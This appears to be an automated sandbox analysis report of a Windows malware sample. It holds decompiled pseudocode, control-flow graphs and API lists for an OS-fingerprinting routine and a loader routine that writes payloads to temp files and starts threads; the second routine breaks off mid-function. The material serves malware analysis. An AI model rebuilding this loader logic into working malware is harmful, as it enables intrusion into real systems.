                                                                                                                                                                                                                                                                                                        control_flow_graph 342 24e8f80-24e8f94 343 24e8f9a-24e8f9e 342->343 344 24e927b-24e9281 342->344 343->344 345 24e8fa4-24e8fa8 343->345 345->344 346 24e8fae-24e8fff call 24e7d20 * 3 GetVersionExA 345->346 353 24e9266-24e926a 346->353 354 24e9005-24e9016 GetSystemInfo 346->354 353->344 355 24e926c-24e9275 lstrcatA 353->355 356 24e901c-24e9023 354->356 357 24e9115-24e911c 354->357 355->344 360 24e9025-24e903d lstrcatA 356->360 361 24e9042-24e9049 356->361 358 24e9122-24e9129 357->358 359 24e9210-24e9217 call 24e9290 357->359 362 24e912b-24e9132 358->362 363 24e9174-24e917b 358->363 381 24e9228-24e9237 lstrlenA 359->381 382 24e9219-24e9222 lstrcatA 359->382 365 24e9110 360->365 366 24e904b-24e9063 lstrcatA 361->366 367 24e9068-24e906f 361->367 371 24e914e-24e9155 362->371 372 24e9134-24e914c lstrcatA 362->372 369 24e917d-24e9184 363->369 370 24e91c3-24e91ca 363->370 365->359 366->365 367->365 368 24e9075-24e907c 367->368 374 24e907e-24e9085 368->374 375 24e90a1-24e90ab GetSystemMetrics 368->375 376 24e9186-24e919e lstrcatA 369->376 377 24e91a0-24e91a7 369->377 370->359 378 24e91cc-24e91d3 370->378 379 24e916f 371->379 380 24e9157-24e9169 lstrcatA 371->380 372->379 374->375 385 24e9087-24e909f lstrcatA 374->385 386 24e90ad-24e90c5 lstrcatA 375->386 387 24e90c7-24e90d1 GetSystemMetrics 375->387 388 24e91c1 376->388 377->388 389 24e91a9-24e91bb lstrcatA 377->389 390 24e91ef-24e91f6 378->390 391 24e91d5-24e91ed lstrcatA 378->391 379->359 380->379 383 24e9259-24e9263 lstrlenA 381->383 384 24e9239-24e9253 lstrcatA * 2 381->384 382->381 383->353 384->383 385->365 386->365 392 24e90ed-24e90f6 387->392 393 24e90d3-24e90eb lstrcatA 387->393 388->359 389->388 390->359 394 24e91f8-24e920a lstrcatA 390->394 391->359 392->365 395 24e90f8-24e910a lstrcatA 392->395 393->365 394->359 395->365
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E8F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v50;
                                                                                                                                                                                                                                                                                                        				signed short _v52;
                                                                                                                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                                        					L45:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					E024E7D20(E024E7D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                                                        					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                                                        					E024E7D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                                                        					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                                                        						L43:
                                                                                                                                                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L45;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                                                        					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                                        						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                                                        							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                                        								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                                        									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                                        										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                                                        												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 8;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                                                        									 *_a12 = 7;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L38:
                                                                                                                                                                                                                                                                                                        						if(E024E9290() != 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                                        						goto L43;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                                        						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                                        							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                                        								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                                                        									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                                                        										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                                                        											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                                                        												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                                                        												 *_a12 = 4;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 6;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 5;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                                                        									 *_a12 = 3;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                                                        							 *_a12 = 2;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                                                        						 *_a12 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L38;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                                                                        0x024e8f89
                                                                                                                                                                                                                                                                                                        0x024e8f94
                                                                                                                                                                                                                                                                                                        0x024e927b
                                                                                                                                                                                                                                                                                                        0x024e9281
                                                                                                                                                                                                                                                                                                        0x024e8fae
                                                                                                                                                                                                                                                                                                        0x024e8fce
                                                                                                                                                                                                                                                                                                        0x024e8fd6
                                                                                                                                                                                                                                                                                                        0x024e8fe8
                                                                                                                                                                                                                                                                                                        0x024e8fff
                                                                                                                                                                                                                                                                                                        0x024e9266
                                                                                                                                                                                                                                                                                                        0x024e926a
                                                                                                                                                                                                                                                                                                        0x024e9275
                                                                                                                                                                                                                                                                                                        0x024e9275
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e926a
                                                                                                                                                                                                                                                                                                        0x024e9009
                                                                                                                                                                                                                                                                                                        0x024e9016
                                                                                                                                                                                                                                                                                                        0x024e911c
                                                                                                                                                                                                                                                                                                        0x024e9129
                                                                                                                                                                                                                                                                                                        0x024e917b
                                                                                                                                                                                                                                                                                                        0x024e91ca
                                                                                                                                                                                                                                                                                                        0x024e91d3
                                                                                                                                                                                                                                                                                                        0x024e91f6
                                                                                                                                                                                                                                                                                                        0x024e9201
                                                                                                                                                                                                                                                                                                        0x024e920a
                                                                                                                                                                                                                                                                                                        0x024e920a
                                                                                                                                                                                                                                                                                                        0x024e91d5
                                                                                                                                                                                                                                                                                                        0x024e91de
                                                                                                                                                                                                                                                                                                        0x024e91e7
                                                                                                                                                                                                                                                                                                        0x024e91e7
                                                                                                                                                                                                                                                                                                        0x024e91d3
                                                                                                                                                                                                                                                                                                        0x024e917d
                                                                                                                                                                                                                                                                                                        0x024e9184
                                                                                                                                                                                                                                                                                                        0x024e91a7
                                                                                                                                                                                                                                                                                                        0x024e91b2
                                                                                                                                                                                                                                                                                                        0x024e91bb
                                                                                                                                                                                                                                                                                                        0x024e91bb
                                                                                                                                                                                                                                                                                                        0x024e9186
                                                                                                                                                                                                                                                                                                        0x024e918f
                                                                                                                                                                                                                                                                                                        0x024e9198
                                                                                                                                                                                                                                                                                                        0x024e9198
                                                                                                                                                                                                                                                                                                        0x024e91c1
                                                                                                                                                                                                                                                                                                        0x024e912b
                                                                                                                                                                                                                                                                                                        0x024e9132
                                                                                                                                                                                                                                                                                                        0x024e9155
                                                                                                                                                                                                                                                                                                        0x024e9160
                                                                                                                                                                                                                                                                                                        0x024e9169
                                                                                                                                                                                                                                                                                                        0x024e9169
                                                                                                                                                                                                                                                                                                        0x024e9134
                                                                                                                                                                                                                                                                                                        0x024e913d
                                                                                                                                                                                                                                                                                                        0x024e9146
                                                                                                                                                                                                                                                                                                        0x024e9146
                                                                                                                                                                                                                                                                                                        0x024e916f
                                                                                                                                                                                                                                                                                                        0x024e9129
                                                                                                                                                                                                                                                                                                        0x024e9210
                                                                                                                                                                                                                                                                                                        0x024e9217
                                                                                                                                                                                                                                                                                                        0x024e9222
                                                                                                                                                                                                                                                                                                        0x024e9222
                                                                                                                                                                                                                                                                                                        0x024e9237
                                                                                                                                                                                                                                                                                                        0x024e9242
                                                                                                                                                                                                                                                                                                        0x024e9253
                                                                                                                                                                                                                                                                                                        0x024e9253
                                                                                                                                                                                                                                                                                                        0x024e9263
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9263
                                                                                                                                                                                                                                                                                                        0x024e9023
                                                                                                                                                                                                                                                                                                        0x024e9049
                                                                                                                                                                                                                                                                                                        0x024e906f
                                                                                                                                                                                                                                                                                                        0x024e907c
                                                                                                                                                                                                                                                                                                        0x024e90ab
                                                                                                                                                                                                                                                                                                        0x024e90d1
                                                                                                                                                                                                                                                                                                        0x024e90f6
                                                                                                                                                                                                                                                                                                        0x024e9101
                                                                                                                                                                                                                                                                                                        0x024e910a
                                                                                                                                                                                                                                                                                                        0x024e910a
                                                                                                                                                                                                                                                                                                        0x024e90d3
                                                                                                                                                                                                                                                                                                        0x024e90dc
                                                                                                                                                                                                                                                                                                        0x024e90e5
                                                                                                                                                                                                                                                                                                        0x024e90e5
                                                                                                                                                                                                                                                                                                        0x024e90ad
                                                                                                                                                                                                                                                                                                        0x024e90b6
                                                                                                                                                                                                                                                                                                        0x024e90bf
                                                                                                                                                                                                                                                                                                        0x024e90bf
                                                                                                                                                                                                                                                                                                        0x024e9087
                                                                                                                                                                                                                                                                                                        0x024e9090
                                                                                                                                                                                                                                                                                                        0x024e9099
                                                                                                                                                                                                                                                                                                        0x024e9099
                                                                                                                                                                                                                                                                                                        0x024e907c
                                                                                                                                                                                                                                                                                                        0x024e904b
                                                                                                                                                                                                                                                                                                        0x024e9054
                                                                                                                                                                                                                                                                                                        0x024e905d
                                                                                                                                                                                                                                                                                                        0x024e905d
                                                                                                                                                                                                                                                                                                        0x024e9025
                                                                                                                                                                                                                                                                                                        0x024e902e
                                                                                                                                                                                                                                                                                                        0x024e9037
                                                                                                                                                                                                                                                                                                        0x024e9037
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e9110

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 024E8FF7
                                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 024E9009
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win2K), ref: 024E902E
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinXP), ref: 024E9054
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Vista), ref: 024E913D
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 024E9160
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 024E918F
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win7), ref: 024E91B2
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 024E91DE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,Win8), ref: 024E9201
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,_x64), ref: 024E9222
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 024E922F
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,024EC980), ref: 024E9242
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 024E9253
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E925D
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 024E9275
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                                                        • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                                                        • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                                                        • Opcode ID: 88a0a6816ed8cb88ac761b3867e5340b86fddbb169b6b0d0760306c084cb7f70
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f768916e918dacf7d07f599f2eaeb56ab3a8d006b67b4ee5300658fcfefca7c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88a0a6816ed8cb88ac761b3867e5340b86fddbb169b6b0d0760306c084cb7f70
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC812CB4A40349EBFF259FA0C889BAE7B75BB05302F108947F917AA281D775D590CF60
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 436 24e62b0-24e62c4 437 24e6c4e 436->437 438 24e62ca-24e62ce 436->438 439 24e6c51-24e6c54 437->439 438->437 440 24e62d4-24e62e0 438->440 440->437 441 24e62e6-24e62ed 440->441 441->437 442 24e62f3-24e6314 441->442 444 24e642e-24e6453 442->444 445 24e631a-24e631e 442->445 452 24e6c2f-24e6c36 444->452 453 24e6459-24e645d 444->453 447 24e6343-24e6363 445->447 448 24e6320-24e633a 445->448 450 24e6429 447->450 451 24e6369-24e6375 447->451 448->447 449 24e633c-24e633e 448->449 449->439 450->444 451->450 454 24e637b-24e6384 451->454 455 24e6c38-24e6c42 452->455 456 24e6c44 452->456 457 24e645f-24e6479 453->457 458 24e6482-24e64a2 453->458 454->450 459 24e638a-24e6393 454->459 455->437 456->437 457->458 460 24e647b-24e647d 457->460 461 24e64a8-24e64b4 458->461 462 24e65f3-24e65fc 458->462 459->450 465 24e6399-24e63a2 459->465 460->439 461->462 466 24e64ba-24e654c GetEnvironmentVariableA call 24e7d20 call 24e9730 GetTickCount GetTempFileNameA CreateFileA 461->466 463 24e65fe 462->463 464 24e6603-24e660f 462->464 463->464 467 24e6bdd-24e6be9 464->467 468 24e6615-24e6621 464->468 469 24e63a4-24e63ca VirtualAlloc 465->469 470 24e6410-24e6424 call 24e1ee0 465->470 466->462 491 24e6552-24e6586 WriteFile 466->491 476 24e6beb-24e6bf7 467->476 477 24e6c18-24e6c24 467->477 468->467 473 24e6627-24e6640 call 24e7250 468->473 474 24e640e 469->474 475 24e63cc-24e63e4 call 24e6260 469->475 483 24e6427 470->483 492 24e6647-24e664e 473->492 493 24e6642 473->493 474->483 494 24e63fd-24e6408 VirtualFree 475->494 495 24e63e6-24e63fa call 24e1ee0 475->495 476->477 482 24e6bf9-24e6c16 call 24ea360 476->482 484 24e6c2a 477->484 485 24e6c26 477->485 482->484 483->444 484->452 485->484 497 24e65dd-24e65e4 491->497 498 24e6588-24e6591 491->498 499 24e6654-24e6674 VirtualAlloc 492->499 500 24e6752-24e675b 492->500 493->492 494->474 495->494 497->462 507 24e65e6-24e65ed CloseHandle 497->507 498->497 504 24e6593-24e65c7 CloseHandle call 24e6c60 call 24e1e60 498->504 499->500 505 24e667a-24e6747 call 24e7b70 call 24e97a0 CreateThread CloseHandle 499->505 502 24e69ba-24e6a49 GetEnvironmentVariableA call 24e7d20 call 24e9730 GetTickCount GetTempFileNameA CreateFileA 500->502 503 24e6761-24e6788 500->503 537 24e6a4f-24e6a75 502->537 538 24e6bd6 502->538 508 24e678e-24e67c0 VirtualAlloc 503->508 509 24e6858-24e6864 call 24e2070 503->509 535 24e65d8 call 24e6cf0 504->535 536 24e65c9-24e65d0 call 24e74a0 ExitProcess 504->536 505->500 507->462 514 24e6856 508->514 515 24e67c6-24e67e7 call 24e6260 508->515 524 24e686a-24e6871 509->524 514->524 533 24e67e9-24e6807 call 24e2070 515->533 534 24e6842-24e6850 VirtualFree 515->534 525 24e6877-24e687e 524->525 526 24e69b0 524->526 531 24e6894-24e689d 525->531 532 24e6880-24e6891 call 24e73c0 525->532 526->502 540 24e698a-24e6993 531->540 541 24e68a3-24e68c8 call 24e97a0 531->541 532->531 533->534 561 24e6809-24e683a VirtualAlloc call 24e7b70 533->561 534->514 535->497 545 24e6b1e-24e6b3c WriteFile 537->545 546 24e6a7b-24e6aad VirtualAlloc 537->546 538->467 549 24e69a9 540->549 550 24e6995-24e69a6 call 24e2510 540->550 565 24e68ca-24e68e7 541->565 566 24e68e9-24e690d VirtualAlloc 541->566 552 24e6b42-24e6b49 545->552 547 24e6aaf-24e6ad0 call 24e6260 546->547 548 24e6b1c 546->548 568 24e6b08-24e6b16 VirtualFree 547->568 569 24e6ad2-24e6b02 WriteFile 547->569 548->552 549->526 550->549 558 24e6b4b-24e6b57 552->558 559 24e6bc9-24e6bd0 CloseHandle 552->559 558->559 564 24e6b59-24e6b82 CloseHandle call 24e1e60 558->564 559->538 572 24e683f 561->572 577 24e6bc7 564->577 578 24e6b84-24e6b8b 564->578 571 24e6934-24e693d 565->571 566->571 573 24e690f-24e6931 call 24e7b70 566->573 568->548 569->568 571->540 574 24e693f-24e6984 CreateThread CloseHandle 571->574 572->534 573->571 574->540 577->538 580 24e6b8d-24e6b9e call 24e73c0 578->580 581 24e6ba1-24e6baa 578->581 580->581 582 24e6bac-24e6bbd call 24e2510 581->582 583 24e6bc0 581->583 582->583 583->577
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E62B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v13;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				long _v56;
                                                                                                                                                                                                                                                                                                        				void _v60;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				void* _v328;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char _v604;
                                                                                                                                                                                                                                                                                                        				int _v608;
                                                                                                                                                                                                                                                                                                        				long _v612;
                                                                                                                                                                                                                                                                                                        				signed int _v616;
                                                                                                                                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                                                                                                                                        				void* _v624;
                                                                                                                                                                                                                                                                                                        				void* _v628;
                                                                                                                                                                                                                                                                                                        				int _v632;
                                                                                                                                                                                                                                                                                                        				signed int _v636;
                                                                                                                                                                                                                                                                                                        				long _v640;
                                                                                                                                                                                                                                                                                                        				void* _v644;
                                                                                                                                                                                                                                                                                                        				void* _v648;
                                                                                                                                                                                                                                                                                                        				void* _v652;
                                                                                                                                                                                                                                                                                                        				char _v916;
                                                                                                                                                                                                                                                                                                        				void* _v920;
                                                                                                                                                                                                                                                                                                        				char _v932;
                                                                                                                                                                                                                                                                                                        				char _v1196;
                                                                                                                                                                                                                                                                                                        				long _v1200;
                                                                                                                                                                                                                                                                                                        				int _v1204;
                                                                                                                                                                                                                                                                                                        				long _v1208;
                                                                                                                                                                                                                                                                                                        				void* _v1212;
                                                                                                                                                                                                                                                                                                        				long _v1216;
                                                                                                                                                                                                                                                                                                        				signed int _v1220;
                                                                                                                                                                                                                                                                                                        				void* _v1224;
                                                                                                                                                                                                                                                                                                        				void* _v1228;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t317;
                                                                                                                                                                                                                                                                                                        				signed char _t321;
                                                                                                                                                                                                                                                                                                        				void* _t333;
                                                                                                                                                                                                                                                                                                        				signed int _t340;
                                                                                                                                                                                                                                                                                                        				void* _t349;
                                                                                                                                                                                                                                                                                                        				signed int _t355;
                                                                                                                                                                                                                                                                                                        				void* _t361;
                                                                                                                                                                                                                                                                                                        				void* _t368;
                                                                                                                                                                                                                                                                                                        				void* _t378;
                                                                                                                                                                                                                                                                                                        				void* _t381;
                                                                                                                                                                                                                                                                                                        				signed int _t383;
                                                                                                                                                                                                                                                                                                        				void* _t386;
                                                                                                                                                                                                                                                                                                        				void* _t393;
                                                                                                                                                                                                                                                                                                        				int _t415;
                                                                                                                                                                                                                                                                                                        				signed int _t421;
                                                                                                                                                                                                                                                                                                        				signed int _t428;
                                                                                                                                                                                                                                                                                                        				signed char _t433;
                                                                                                                                                                                                                                                                                                        				void* _t439;
                                                                                                                                                                                                                                                                                                        				signed char _t442;
                                                                                                                                                                                                                                                                                                        				void* _t448;
                                                                                                                                                                                                                                                                                                        				signed int _t452;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t455;
                                                                                                                                                                                                                                                                                                        				void* _t465;
                                                                                                                                                                                                                                                                                                        				void* _t472;
                                                                                                                                                                                                                                                                                                        				void* _t473;
                                                                                                                                                                                                                                                                                                        				void* _t508;
                                                                                                                                                                                                                                                                                                        				void* _t509;
                                                                                                                                                                                                                                                                                                        				void* _t528;
                                                                                                                                                                                                                                                                                                        				void* _t529;
                                                                                                                                                                                                                                                                                                        				void* _t539;
                                                                                                                                                                                                                                                                                                        				void* _t549;
                                                                                                                                                                                                                                                                                                        				void* _t550;
                                                                                                                                                                                                                                                                                                        				void* _t551;
                                                                                                                                                                                                                                                                                                        				void* _t563;
                                                                                                                                                                                                                                                                                                        				void* _t598;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L99:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 =  *_a4;
                                                                                                                                                                                                                                                                                                        					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                                                        						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                                                        							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                                                                                                                        								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee270; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									L22:
                                                                                                                                                                                                                                                                                                        									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                                                        									__eflags = _t428;
                                                                                                                                                                                                                                                                                                        									_v24 = _t428;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t508 = _v20;
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                                        								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *0x24f435d & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(( *0x24f435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t509 = _v20;
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        									_t433 = E024E1EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                                                        									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									L21:
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
